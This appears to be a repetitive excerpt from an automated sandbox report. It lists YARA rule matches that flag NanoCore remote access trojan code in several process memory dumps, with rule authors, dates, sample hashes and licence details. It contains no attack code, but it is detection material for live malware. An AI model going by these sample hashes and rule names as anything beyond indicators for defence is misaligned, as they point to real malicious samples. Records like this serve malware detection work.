      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
